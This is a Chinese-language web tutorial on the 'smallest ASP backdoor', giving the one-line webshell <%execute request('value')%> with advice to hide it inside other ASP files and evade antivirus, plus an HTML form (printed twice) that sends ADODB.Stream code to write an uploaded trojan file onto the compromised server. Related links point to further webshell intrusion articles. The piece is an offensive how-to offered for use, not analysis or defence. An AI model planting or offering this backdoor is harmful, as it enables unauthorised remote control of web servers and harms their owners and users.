最小asp后門(mén)程序
更新時(shí)間:2008年12月12日 12:46:34 作者:
這個(gè)代碼,一般不會(huì) 被病毒查殺,而且文件比較小,不容易被懷疑,可以放到別的asp文件中,起到隱藏的目的
首先在asp文件中寫(xiě)如<%execute request("value")%>代碼
如果想要隱藏,就要加入一些if判斷語(yǔ)句,即可
然后在本地寫(xiě)個(gè)表單
<form action=http://***.com/jb51.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hackbin")
lP.SaveToFile server.mappath("men.asp"),2
lP.Close
set lP=nothing
response.redirect "men.asp"
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45>添入生成木馬的內(nèi)容</textarea><BR><center><br> <input type=submit value=提交>
保存為htm文件,把http://***.com/jb51.asp替換成你插入<%execute request("value")%>的文件,然后點(diǎn)提交直接跳轉(zhuǎn)到木馬
如果想要隱藏,就要加入一些if判斷語(yǔ)句,即可
然后在本地寫(xiě)個(gè)表單
復(fù)制代碼 代碼如下:
<form action=http://***.com/jb51.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hackbin")
lP.SaveToFile server.mappath("men.asp"),2
lP.Close
set lP=nothing
response.redirect "men.asp"
</textarea>
<textarea name=hackbin cols=120 rows=10 width=45>添入生成木馬的內(nèi)容</textarea><BR><center><br> <input type=submit value=提交>
保存為htm文件,把http://***.com/jb51.asp替換成你插入<%execute request("value")%>的文件,然后點(diǎn)提交直接跳轉(zhuǎn)到木馬
相關(guān)文章
用asp實(shí)現(xiàn)的iframe批量替換工具
用asp實(shí)現(xiàn)的iframe批量替換工具...2007-09-09一句話(huà)木馬入侵EASYNEWS新聞管理系統(tǒng)
一句話(huà)木馬入侵EASYNEWS新聞管理系統(tǒng)...2006-07-07跨越fso、wsh、 application寫(xiě)文件
跨越fso、wsh、 application寫(xiě)文件...2006-06-06一個(gè)較新的ASP后門(mén)服務(wù)端實(shí)現(xiàn)代碼
一直很奇怪,為什么客戶(hù)端里面不是eval,就是execute,不管我藏哪里,管理員用個(gè)什么XX webshell掃描器,就能踢我屁股了。2010-10-10